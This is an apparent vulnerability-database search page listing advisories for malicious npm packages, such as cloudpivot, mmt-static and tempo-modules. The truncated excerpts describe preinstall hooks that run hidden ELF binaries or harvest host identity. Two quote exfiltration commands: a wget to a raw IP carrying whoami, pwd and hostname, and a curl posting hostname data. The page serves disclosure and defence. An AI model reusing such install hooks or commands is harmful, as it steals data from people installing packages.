Lucene search
K

723 matches found

OSV
OSV
added 2026/05/26 1:0 a.m.16 views

MAL-2026-4726 Malicious code in weavedb-tools (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e2da95bd75489853f6b09a9aef5a5ee03ee6715b41dac446d29f273c750027a3 package.json declares "preinstall": "./dist/runtime.node", which directly executes a 976KB Linux ELF binary at every npm install. The .node extension...

5.9AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/26 1:0 a.m.12 views

Malicious code in cwao-tools (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 821b56cf14d7125df010804baf204325703e58d8f238fc0f219bf82652d99f31 package.json declares "preinstall": "./scripts/postbuild", and scripts/postbuild is a 976,568-byte stripped Linux x86 ELF sha256 36abd242…. The packa...

6.3AI score
Exploits0References3
OSV
OSV
added 2026/05/26 1:0 a.m.13 views

MAL-2026-4545 Malicious code in cwao-tools (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 821b56cf14d7125df010804baf204325703e58d8f238fc0f219bf82652d99f31 package.json declares "preinstall": "./scripts/postbuild", and scripts/postbuild is a 976,568-byte stripped Linux x86 ELF sha256 36abd242…. The packa...

6.3AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/26 1:0 a.m.14 views

Malicious code in cwao (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f48b0fefe9d99bcebeaa878f5bb2ca40df917b40785d6b5b8a31cf6e70a44970 package.json declares "preinstall": "./vendor/setup", which directly executes a 976,568-byte packed Linux x86 ELF binary shipped in the tarball. The...

5.9AI score
Exploits0References3
OSV
OSV
added 2026/05/26 1:0 a.m.8 views

MAL-2026-4689 Malicious code in test-ajs (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 851b521e3dde5ea11478cd37cc4bf8da2f0a0ca1864d6c39fa27fd02ef0f9308 test-ajs advertises a 2KB React/Recoil helper dist/cjs/index.js, 2169 bytes, exporting Roid/inject glue over react+recoil but ships a 976KB Linux ELF...

6AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/26 12:59 a.m.15 views

Malicious code in zkjson (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 758a19e42db66cf6ae7a08d462278b30e3a154b56613d2d95f8020de3add3816 package.json declares "preinstall": "./.github/scripts/precheck", pointing to a 976 KB Linux ELF executable sha256...

6.3AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/25 2:16 p.m.13 views

Malicious code in tempo-modules (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6ad4276e2eafbe6d7040f94ac546ec20e7ac211e1e5906964c25f581a519d183 [email protected] is a dependency-confusion attack package. The package.json preinstall hook executes poc.js, which on every npm install harvests...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/25 2:15 p.m.17 views

Malicious code in platform-tempo (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6d1c69e098c3ebeb2876b746523bea0220034b429f58e0a55683f0ee2c8776cd [email protected] declares a preinstall hook that runs poc.js on every npm install. The script collects host identity os.hostname, whoami /all /...

5.8AI score
Exploits0References1
OSV
OSV
added 2026/05/25 2:15 p.m.8 views

MAL-2026-4641 Malicious code in platform-tempo (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6d1c69e098c3ebeb2876b746523bea0220034b429f58e0a55683f0ee2c8776cd [email protected] declares a preinstall hook that runs poc.js on every npm install. The script collects host identity os.hostname, whoami /all /...

5.8AI score
Exploits0References1
OSV
OSV
added 2026/05/25 1:57 p.m.8 views

MAL-2026-4586 Malicious code in intl-ad-routing (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 07b57475540583a4a2af3fb2d790f066c2e77742a704b3e5048c118f82cc8185 [email protected] is a dependency-confusion squat targeting an internal @livingdesign/react namespace. On npm install, the package's preinstall...

5.9AI score
Exploits0References3
OSV
OSV
added 2026/05/25 1:57 p.m.17 views

MAL-2026-4686 Malicious code in tempo-layout (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 795bf7080d27cef141114dd46b5734c136f762933a43f2d1308e82547c5f99a6 [email protected] ships a preinstall hook poc.js that unconditionally collects host identity os.hostname, whoami, id, network configuration...

5.8AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/23 8:2 a.m.12 views

Malicious code in cloudpivot (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4bd95ac92732da86e3ec63771e124da83ea8d98e1dd2f6636ab3d8dde76ab34c On npm install, the package.json preinstall hook runs wget against http://194.120.24.50:7374 with query parameters carrying $whoami, $pwd, $hostname,...

5.9AI score
Exploits0References2
OSV
OSV
added 2026/05/23 8:2 a.m.10 views

MAL-2026-4529 Malicious code in cloudpivot (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4bd95ac92732da86e3ec63771e124da83ea8d98e1dd2f6636ab3d8dde76ab34c On npm install, the package.json preinstall hook runs wget against http://194.120.24.50:7374 with query parameters carrying $whoami, $pwd, $hostname,...

5.9AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/22 6:12 p.m.13 views

Malicious code in mmt-static (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 755d0176c106903bf2baaf14d0bb4df611bb719c2a7b0615e9b4487eadee1300 On npm install, the package's preinstall lifecycle hook executes node index.js && curl --data-urlencode "info=$hostname && whoami"...

5.8AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/22 1:55 a.m.12 views

Malicious code in mev-shield (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9783d5e48d62da6de516b1cf5d36474143528a9c6f33a86892ee558266a4e5ec The package advertises itself as an 'MEV protection layer for Ethereum trading bots' but does the opposite. On npm install, a postinstall script...

5.8AI score
Exploits0References1
OSV
OSV
added 2026/05/22 12:15 a.m.7 views

MAL-2026-4582 Malicious code in ignite-market-contracts (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3632f7802511e2852d33925ab4d8612fe588de1f8a1d832011cd3588d23f62bc The package's preinstall lifecycle hook in package.json runs wget --quiet...

5.8AI score
Exploits0References1
OSV
OSV
added 2026/05/22 12:13 a.m.9 views

MAL-2026-4583 Malicious code in ignite-market-contractstest (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b9babd9b088785649368dbf885050b6a15b218a6b38d2dcd058f0c9eda5109da package.json declares a preinstall lifecycle hook that runs wget --quiet...

5.8AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/22 12:13 a.m.13 views

Malicious code in ignite-market-contractstest (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b9babd9b088785649368dbf885050b6a15b218a6b38d2dcd058f0c9eda5109da package.json declares a preinstall lifecycle hook that runs wget --quiet...

5.8AI score
Exploits0References2
OSV
OSV
added 2026/05/21 8:18 p.m.7 views

MAL-2026-4530 Malicious code in cloudsmith-vsc (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2b49ad4432747f754181e7a8428aff5fd2613f9d86283f05a04c2dd1f9ac2f2f package.json declares a preinstall hook "preinstall": "node index.js" that runs automatically on npm install. index.js reads installer-side system...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/21 8:18 p.m.11 views

Malicious code in cloudsmith-vsc (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2b49ad4432747f754181e7a8428aff5fd2613f9d86283f05a04c2dd1f9ac2f2f package.json declares a preinstall hook "preinstall": "node index.js" that runs automatically on npm install. index.js reads installer-side system...

5.8AI score
Exploits0References1
Rows per page
Query Builder